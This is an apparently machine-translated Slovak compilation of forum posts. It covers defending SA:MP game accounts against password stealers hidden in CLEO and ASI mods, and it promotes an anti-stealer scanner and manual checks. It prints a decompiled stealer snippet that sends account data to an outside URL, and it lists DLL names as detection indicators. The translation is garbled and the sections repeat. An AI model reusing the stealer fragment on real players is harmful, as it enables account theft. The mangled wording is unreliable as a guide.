Úplne prvý skener, ktorý sa objavil ešte v časoch, keď bol vyvinutý prvý ASI styler. Hneď na druhý deň po objavení sa stilleru som začal vyvíjať svoj vlastný anti-steeler.

Skener obsahuje nasledujúce moduly:
- YARA signature engine (vďaka programovaciemu tímu Virustotal za taký výkonný nástroj),
- skriptový engine od Andreasa Jonsona (AngelScript), rýchlosť, jednoduchosť vkladania a krása podobných skriptov v jednom projekte. Práve vďaka nemu môžete rýchlo a technicky otvárať kryptory pre CLEO.
- Emulátor kódu SCM, schopný celkom dobre propagovať kryptory CLEO (odo mňa)

Vlastnosti programu:
- Pomerne veľká databáza zlodejov, ktorá sa približne od roku 2014 rozrastá. Zhromaždili sme pomerne veľa škodlivých modov z niekoľkých veľkých a nie príliš veľkých stránok.
- Schopnosť skenovať priečinky a súbory ich pretiahnutím do okna programu.
- Záver stručná informácia O malvér(typ, prezývka vývojára a v starších verziách databázy prezývky distribútorov)
- Skenujte asi, dll, cleo, sf, cs a ďalší potenciál nebezpečné súbory.
- Detekcia škodlivého kódu v súboroch so zmenenou príponou, napríklad nie tak dávno bolo v móde premenovať zlodejov na txd súbory a načítať ich do hry pomocou loaderu.
- Rozbalenie zašifrovaných skriptov CLEO a následné skenovanie (treba podotknúť, že dešifruje len známe kryptory a tie, na ktoré sme narazili, no tento fakt sa dá jednoducho opraviť, stačí nám napísať na email a odoslať súbor). Keď skenujete rozbalený skript, môžete nájsť jeho zdroj v súbore temp\decrypt.cs.
- Za behu emulujte kód SCM a dešifrujte skript, po ktorom nasleduje kontrola škodlivého kódu. (Ak sa zistí škodlivý kód, pozrite si výpis v temp\decrypt.cs)
- Priateľské a intuitívne rozhranie programu.
- Vysoká rýchlosť skenovanie pri kontrole veľkého počtu súborov.
- Zabudované prezeranie nájdeného súboru v textovom a hexadecimálnom režime

Mimoriadne dôležitý bod! Každý by si to mal prečítať, aby sa nepýtal hlúpe otázky.
Skener je navrhnutý len na kontrolu herných modifikácií vybalených z archívu, v každom inom prípade je to zbytočné!
On tiež NIE JE určené pre inštalátory a automatické inštalátory, balíčky msi, exe, pif, mmbak, com, scr, vbs, bat, cmd, js a ďalšie potenciálne nebezpečné súbory, ktoré sa nenachádzajú v herných modoch, existujú antivírusy pre tieto súbory!
Tiež NESMIETE skenovať celý systém, je to zbytočné a nedáva to zmysel. Tento skener je testovaný na mody a je určený len pre mody. Môžete skenovať priečinok hry, ale tu musíte pochopiť, že hra má súbory, ktoré majú prístup na internet a sú pripravené na to, aby ste ich videli v okne skenera.

Chcel by som vás na to hneď upozorniť tento program nebude chrániť vaše účty 100%, ako akýkoľvek iný antivírus alebo skener. Ked napisu na obal antivirus 100% ochrana, to uz je pre mna signal na odstranenie antiviru z disku. Tento skener však môže urýchliť kontrolu už známych zlodejov a pomôže vám vyhnúť sa návnadám neskúsených distribútorov.
Väčšina najlepší antivírus- je to vaša hlava a rozhodnutia - sťahovať alebo nesťahovať. Mody si sťahujte iba z dôveryhodných stránok, kde sa sleduje bezpečnosť archívu.


Autor programu nezodpovedá za vaše rozhodnutia a prípadných zlodejov zmeškaných skenerom.

Niektorí symbolov programy:

Pozor! Bol zistený súbor, ktorý môže vytvoriť internetové pripojenie, mali by ste na to myslieť pred jeho inštaláciou do hry. Môže to však byť aj automatická aktualizácia skriptu. V súbore je tiež možné mať URL. Všetko závisí od vašej schopnosti ručne kontrolovať súbory.

Styler CLEO bol nájdený, súbor bol rozbalený a môžete sa pozrieť na zdroj.

Skener sa pokúsil rozbaliť skript, ale možno to nefungovalo, alebo sa škodlivý kód nenašiel. Pozrite si zdroj v priečinku temp. Uistite sa, že súbor nie je zašifrovaný. Tu musíte skript skontrolovať manuálne.

Našiel sa CLEO stiller v otvorenej forme.

Bol nájdený súbor, ktorý sťahuje malvér do vášho počítača

Našiel sa zátiší z notoricky známeho projektu

Bola nájdená ochrana, súbor môže predstavovať hrozbu. Tu sa stačí spoľahnúť na poctivosť a povesť autora. Opýtajte sa autora, prečo bol súbor zašifrovaný (chránený), a potom sa sami zamyslite nad primeranosťou odpovede. Tento súbor môže byť nebezpečný.

Možno je súbor zablokovaný inou aplikáciou alebo má nulovú veľkosť

Neodporúčam dávať takéto súbory do hry. Tu sa dá očakávať čokoľvek. Ide o zlúčenie niekoľkých súborov do jedného. Medzi týmito súbormi môže byť zlodej alebo iný malvér. Neverte lepidlám. O tom, že je lepenie bezpečné, sa presvedčíte len tak, že ho roztriedite do súborov a skontrolujete každý súbor samostatne.

Žiadame vás, aby ste si stiahli program iba z oficiálnych zdrojov. Toto bude najviac bezpečná možnosť.
O prípadných chybách píšte e-mailom alebo v tomto vlákne.


Pre dynamickú ochranu účtu odporúčame použiť špeciálny plugin od DarkP1xel.

Tento doplnok blokuje nebezpečné funkcie v skriptoch a iných modifikáciách.
Ak máte tento plugin nainštalovaný v hre, mody nebudú môcť odosielať webové požiadavky na servery tretích strán, čo znamená, že vaše vzorové heslo sa nedostane do nesprávnych rúk, aj keď ste zlodeja omylom nainštalovali do hra. Plugin tiež vedie podrobný záznam o všetkých podozrivých udalostiach v hre. Dôležité. Plugin je neustále aktualizovaný, zostaňte naladení.
p.s: nezabudnite poďakovať autorovi za plugin ;)

Ďakujeme všetkým, ktorí nám pomohli.
Špeciálne poďakovanie patrí Gedwadion, DarkP1xel. Sú to super chalani, ktorí majú budúcnosť v IT bezpečnosti.

Autori:
drobné - rozvoj, podpora projektov
andre500 - testovanie, podpora projektu
Webové stránky autorov (oficiálne zdroje): webová stránka Libertycity.ru
Mail: smalloff@site
Stiahnite si program:AVPGameProtect18042019.rar
Doprajte vývojárovi programu pivo (vopred ďakujeme): Yandex nefiltrovaný

(Pozor! Podpora verejného projektu bola úplne ukončená.)

[Seriózny hlas Chonišviliho]: Bez mnohých slov. Posrat šou. Kým to píšem, váš bulletin a vila na BB sú už zlúčené do stavu a virtuály prevedené na útočníka, ach-ha-ha-ha, kašeľ kašeľ kašeľ kašeľ *dusený*

Môžete si schladiť prdy, pretože cleo súbory sa na stránku nenahrávajú. To však neznamená, že sú na projekte Samp-Rp zakázané. Nenechajte sa zmiasť, sakra!
Všetci fanúšikovia úprav sa stretli s pojmom „Stiller“ (známy aj ako Keylogger, ale to je už iný príbeh). Obyčajne ich stillers dávajú do cleo-skriptov, o ktorých si teraz povieme.

Čo je cleo skript?

Nebudem vysvetľovať, čo je cleo skript. všeobecný pojem, prejdime rovno k online hre. Cleo-scripty pre SA:MP"a sú navrhnuté tak, aby zlepšili komfort hry. Vďaka nim si môžete zmeniť rozhranie tak, aby vám vyhovovalo. Opravovať rôzne chyby, pády atď. Existujú však aj škodlivé (alebo podvádzajúce) cleo -scripts (cheat - podvod z angličtiny), ktoré sú mimochodom prísne zakázané na projekte Samp-Rp . Boli vytvorené pre deti, ktoré život uráža a v škole ich bili. Nemôžete si pomôcť, ale vložiť frázu: "Chits sú ako Viagra, pre tých, ktorí to sami nedokážu."
Najznámejšie cleo-skripty ( .c leo s cript files) - ide o indikátor HP v číslach, štvorcový radar, skript, ktorý zvyšuje FPS, rôzne formy brnenia a pruhov zdravia (niekedy to dokonca nie sú len pruhy, ale napríklad vaša obľúbená postava A$AP Rocky. Keď sa HP zníži, fotografia zmizne a zostane iba silueta).
Mnoho ľudí trápi otázka, prečo na stránke nie je séria enb? Faktom je, že .asi formát, toto je tiež súbor cleo, iba skompilovaný. To znamená, že do nej môžete všiť aj styler.
Asi sa pýtate, prečo píšem tému, keď na stránke aj tak nie je Cleo. Ale toto nie je na stránke, ale aby ste to mohli obsahovať, potrebujete aspoň StreamMemFix1.0 .asi A to je len jedna z mnohých opráv pre GTA, ktorých má každý fanúšik pumpovania svojho Sanu plné zuby Andreas mods do kapacity, a tak z nej vyrobiť cukríky. A o c-hudoch a iných úpravách už mlčím. Mrzí vás ten účet? Potom je táto téma určená práve vám!

Ako skontrolovať, či súbor .cs neobsahuje styler?

Najbežnejším spôsobom je kontrola cez program Wireshark. Všetko, čo potrebujete:

• 1. Stiahnite si samotný program (môžete to urobiť z oficiálnej webovej stránky).
• 2. Pozrite si toto video, všetko je tam jasne vysvetlené.
  

=====================================================================================================

Druhý spôsob, ako skontrolovať Cleo pre Stillera. IN Najnovšia verzia kleo-knižnice prichádzajú doplnkové programy, jeden z nich sa volá Sunny Builder- čo potrebujeme.

0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es – stránka, na ktorú sa odosielajú údaje o účte.
@stealer_by_mg 0 1@ je samotný vývojár zlodeja.

=================================================================================================

Existuje aj tretí spôsob, ako skontrolovať, či súbor nie je kradnutý. Existuje skript "steal_logger" .asi„Použijeme to na kontrolu.
(Áno, on sám je cleo formát, ale nie je sa čoho obávať, ak vás nenapadne ísť s ním do základu). Link ti na to nedám, hľadaj si to na internete.
Stručne vysvetlím, ako ho používať.

• 1. Vložte ho do priečinka hry.
• 2. Poďme do akýkoľvek Server SA:MP, pod akýkoľvek nikto
• 3. Vymyslíme akékoľvek heslo, prihlásime sa a hru zatvoríme.
• 4. Mala by byť vytvorená v priečinku textový súbor (.TXT formát). Kliknite naň a v texte hľadáme riadok s IP nášho servera a heslom pre novo zaregistrovaný účet. Nájdené - to znamená, že hacker už tieto údaje má. Nech je rád, keď sa príde hrať s bičom. A v tomto čase odstraňujeme posledný cleo súbor.

[!] Použiť ako šek iba novo vytvorené účty, neprihlasujte sa do svojich hlavných účtov pomocou tohto skriptu. Po kontrole odstráňte \ alebo vytvorte samostatnú kópiu GTA na kontrolu skriptov [!]

Ako skontrolovať, či súbor .asi neobsahuje zlodeja?

Ľahká časť sa skončila. Teraz sa naučme kontrolovať .asi-files, pretože styler v nich nevidí Wireshark. Čo robiť? Zverejním niekoľko najznámejších metód.

Väčšina efektívna metóda kontroly. Kontrola cez program IEInspector HTTP Analyzer.

===============================================================================================================

Druhým spôsobom je skontrolovať kód pomocou poznámkového bloku.

• 1. Otvorenie .asi cez Poznámkový blok.
• 2. Pozrime sa na kód.

Príklad čistého, keď (No stiller)

Príklad kódu s tichý(nie kernel.dll)

Venujme pozornosť posledným riadkom.

Ďalšou možnosťou skrytého zlodeja sú názvy v texte „urlmon.dll“, „wininet.dl l“, „wsock32.dll“ v samotnom kóde. Alebo riadok" kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA LOADER ERROR"

========================================================================================================

"Administrácia neobnovuje stratené účty"- povedali.
„Bezpečnosť účtu je vo vašich rukách“. Dúfam, že po prečítaní tejto témy sú vaše „ruky hore“ silnejšie. Postarajte sa o svoje účty.

2015-2015 © Zozbierané z rôznych fór.

AVPGameProtect je program, ktorý vám pomáha hľadať škodlivé súbory v herných modifikáciách. Hlavná prednosť programy pred ostatnými anti-stealermi - možnosť hromadného skenovania, t.j. môžete skenovať úplne akékoľvek súbory a v akomkoľvek množstve, stačí preniesť potrebné súbory alebo priečinok so súbormi do okna programu a počkajte na výsledky kontroly.

Vlastnosti programu:
- Veľká databáza zlodejov, ktorá je vedená od roku 2014.
- Skenovanie asi, dll, cleo, sf, cs a iných potenciálne nebezpečných súborov.
- Vysoká rýchlosť pri skenovaní veľkého počtu súborov.
- Zobrazenie informácií o zlodejovi v okne programu (typ zlodeja alebo prezývka vývojára).
- Zabudované prezeranie nájdených súborov v textovom a hexadecimálnom režime.
- Vyhľadajte funkcie na interakciu s internetom alebo sťahovanie súborov.
- Kontrola skriptov CLEO na prítomnosť zlodeja (nie všetkých, iba tých s kryptormi, ktoré program pozná). Dešifrovaný skript sa objaví v priečinku temp, v koreňovom priečinku programu pod názvom decrypt.cs
- FuncCrypt prepis z SR_Team a mnoho ďalších.
- Nepretržitá podpora programu.

Skener nie je určený na kontrolu inštalátorov a zostavení hier ani na úplnú kontrolu počítača. Ak chcete skenovať, musíte extrahovať priečinok alebo súbory z archívu a pretiahnuť ich do programu.

Za zmienku tiež stojí, že program nechráni používateľov 100%. Ako každý iný anti-stealer je určený len na identifikáciu jemu známych zlodejov a ďalšie rozhodnutie o použití toho či onoho modu je priamo na vás a autor nenesie zodpovednosť za VAŠE rozhodnutia. Program bude neustále aktualizovaný.

Niektoré programové konvencie:
InetLoader- Pozor! Bol zistený súbor, ktorý môže vytvoriť internetové pripojenie, mali by ste na to myslieť pred stiahnutím. Môže to však byť aj automatická aktualizácia skriptu.
CLEO_Stealer - Styler CLEO bol nájdený, súbor bol rozbalený a môžete sa pozrieť na zdroj.
CLEO_Crypter - Skener sa pokúsil rozbaliť skript, možno to nefungovalo, alebo sa nenašiel škodlivý kód. Pozrite si zdroj v priečinku temp.
CLEO_Stealer- Našiel sa CLEO stiller v otvorenej forme.
Downloader_stealer- Našiel sa súbor, ktorý sťahuje malvér do vášho počítača
Stealers_ru- Našiel sa depilátor zo známeho projektu
Danger_VMProtect- Našla sa ochrana, súbor môže predstavovať hrozbu
Skenovanie zlyhalo - Súbor môže byť zablokovaný inou aplikáciou alebo má nulovú veľkosť
JoinFiles- Skener našiel niekoľko súborov zlúčených do jedného. Medzi týmito súbormi môže byť zlodej alebo iný malvér.

Ako sa môžete vyhnúť tomu, aby ste narazili na zlodeja?!

Stealer je skript, ktorý sa inštaluje skopírovaním súboru so škodlivým kódom do priečinka GTA. Po inštalácii, vždy, keď sa prihlásite na herný server, načíta všetky zadané údaje v dialógoch (pin kódy, heslo, tajné kľúče, údaje) a odošle ich útočníkovi. Takže jednoduchou inštaláciou skriptu do priečinka GTA, ak do dialógu zadáte správne údaje, môžete prísť o všetky svoje herné účty.

Zapnuté tento moment Prípady krádeží herných účtov na rôznych serveroch Samp sú čoraz častejšie. Najčastejšie ide o servery s režimom hrania rolí, keďže herná mena má svoju hodnotu. Útočníci zarábajú na vašej hlúposti. V tomto článku vám ukážem metódy, ktoré poznám. Viete, ľudia, ktorí robia týchto zlodejov, žijú podľa zásady „Ak nebudete jesť, nebudete žiť“.

Základné rady:

1. Vždy používajte všetky spôsoby ochrany účtu, ktoré vám poskytuje administrácia projektu, na ktorom hráte. (Grafický PIN kód, SMS väzba atď. Všetko závisí od funkčnosti servera).
2. Používajte heslo, ktoré je čo najdlhšie a má zložitú štruktúru.
3. Neprihlasujte sa na server heslom, ktoré používate na ostatných.
4. Nezdieľajte informácie o svojom účte s niekým, kým si nie ste 100% istý.
5. Neodporúčam vám používať v hre rôzne vlastné úpravy. Môžu obsahovať zašifrovaný vírus (Stiller). Stiller (z angličtiny ukradnúť, ukradnúť) je určitá trieda trójskych koní (malvér, vírusy - čokoľvek chcete), ktorých funkčnosť spočíva výlučne v krádeži hesiel uložených v systéme a ich odoslaní „autorovi“
Po nainštalovaní stealer modu pri vstupe do hry zadáte svoje heslo a úspešne prejde do rúk zlodeja. Najčastejšie vložené do modov ako (Hood, grafické nastavenia a Asi plugin).
6. Používajte antivírus! Nedovolí vám posielať uloženú poštu alebo účet na infikované stránky (ochrana pred chytľavými a zlodejmi (exe)).
7. Administrácia servera SA:MP neobnovuje napadnuté účty a nevracia stratené peniaze a nikdy nebude žiadať heslá vašich účtov.

Prvý spôsob.

A tak je prvý spôsob 100% účinný!!!
Ak si nestiahnete rôzne mody, cleo skripty, cheaty, tak nebudete mať ŽIADEN PROBLÉMY a ŽIADNE zlodejov!

Skontrolujte cez webovú stránku:

Prvá metóda bude chrániť pred všetkými hackmi, ale to nie je vhodné pre každého.
A tak je druhý spôsob vhodný pre tých, ktorí si sťahujú skripty, rôzne mody, kukly, cheaty a pod. Preto mám pre vás východisko, ktoré vás však 100% neochráni! Stránka, ktorá kontroluje súbory rôzne skripty, práve tu . Návštevou stránky si môžete prečítať "

Najnovšie verzie zlodejov môžu mať formáty .txd .dff .png .dat. Sú však pripojené v zásuvných moduloch .asi .cs .sf a bez pripojenia nebudú fungovať. Preto skontrolujte všetky pluginy a skripty pomocou našej kontroly. Ak máte v GTA skryté súbory, odstráňte ich.

Z toho usudzujeme, že teraz môžu fotografi vložiť bežnú fotografiu do modov, dokonca aj do súboru .png. Veľa ľudí hovorí

"Si ovca alebo čo? Vypadni odtiaľto! Hrám SA:MP už 5 rokov a viem, že zlodeji prichádzajú len v modifikáciách alebo cleo formátoch!"

Nie sú tam žiadni chlapi, ako môžeme vidieť aj na jednoduchom obrázku, zbraň.png povedzme, že viem, možno zlodej! Vždy kontrolujeme akýkoľvek mod, ako by ste niekomu verili. A tak, keď skontrolujeme, či sa v súbore nenachádza zábrana, ak sa objaví

Informácie o výsledkoch vyhľadávania:

Zlodej sa nenašiel:

Počas kontroly súborov sa nenašiel žiadny škodlivý kód ani nič podozrivé. To znamená, že sa nemusíte starať o svoj účet, naša kontrola využíva všetko možné metódy detekciu škodlivého kódu v skriptoch.

Vlastnosti programu:
- Pomerne veľká databáza zlodejov, ktorá sa približne od roku 2014 rozrastá. Zhromaždili sme pomerne veľa škodlivých modov z niekoľkých veľkých a nie príliš veľkých stránok. Špeciálne poďakovanie patrí stránke Gtavicecity.ru za poskytnuté vzorky.
- Schopnosť skenovať priečinky a súbory ich pretiahnutím do okna programu.
- Zobrazuje stručné informácie o škodlivom programe (typ, prezývka vývojára a v starších verziách databázy distribútorov)
- Skenovanie asi, dll, cleo, sf, cs a iných potenciálne nebezpečných súborov.
- Detekcia škodlivého kódu v súboroch so zmenenou príponou, napríklad nie tak dávno bolo v móde premenovať zlodejov na txd súbory a načítať ich do hry pomocou loaderu.
- Rozbalenie zašifrovaných skriptov CLEO a následné skenovanie (treba podotknúť, že dešifruje len známe kryptory a tie, na ktoré sme narazili, no tento fakt sa dá jednoducho opraviť, stačí nám napísať na email a odoslať súbor). Keď skenujete rozbalený skript, môžete nájsť jeho zdroj v súbore temp\decrypt.cs.
- Za behu emulujte kód SCM a dešifrujte skript, po ktorom nasleduje kontrola škodlivého kódu. (Ak sa zistí škodlivý kód, pozrite si výpis v temp\decrypt.cs)
- Priateľské a intuitívne rozhranie programu.
- Celkom jednoduchý koncept programu, čo znamená, že ho možno ľahko a často aktualizovať.
- Vysoká rýchlosť skenovania pri skenovaní veľkého počtu súborov.
- Zabudované prezeranie nájdeného súboru v textovom a hexadecimálnom režime

Skener je určený len na kontrolu herných modifikácií vybalených z archívu, v inom prípade je zbytočný.
Tiež NIE je určený pre inštalatérov a automatických inštalátorov.

POZOR!!!
Chcel by som vás okamžite upozorniť, že tento program nebude chrániť vaše účty na 100%, ako akýkoľvek iný antivírus alebo skener. Ked napisu na obal antivirus 100% ochrana, to uz je pre mna signal na odstranenie antiviru z disku. Tento skener však môže urýchliť kontrolu už známych zlodejov a pomôže vám vyhnúť sa návnadám neskúsených distribútorov.
Najlepším antivírusom je vaša hlava a rozhodnutia – sťahovať alebo nesťahovať. Mody si sťahujte iba z dôveryhodných stránok, kde sa sleduje bezpečnosť archívu.

Niektoré programové konvencie:

VO VÝVOJI

HttpAnalyzer je analyzátor sieťovej prevádzky. Ak ste hľadali funkčný nástroj, ktorého účelom je sledovať HTTP a HTTPS prevádzku v reálnom čase, tak si myslím, že by sa vám mal tento program páčiť, je to akýsi sniffer, ktorý dokáže prehľadne zobraziť všetky potrebné informácie o pripojeniach!

Vo všeobecnosti môže HTTP Analyzer robiť veľa vecí, myslím, že si môžete prečítať podrobnejšie na oficiálnych stránkach, napísal som hlavnú myšlienku.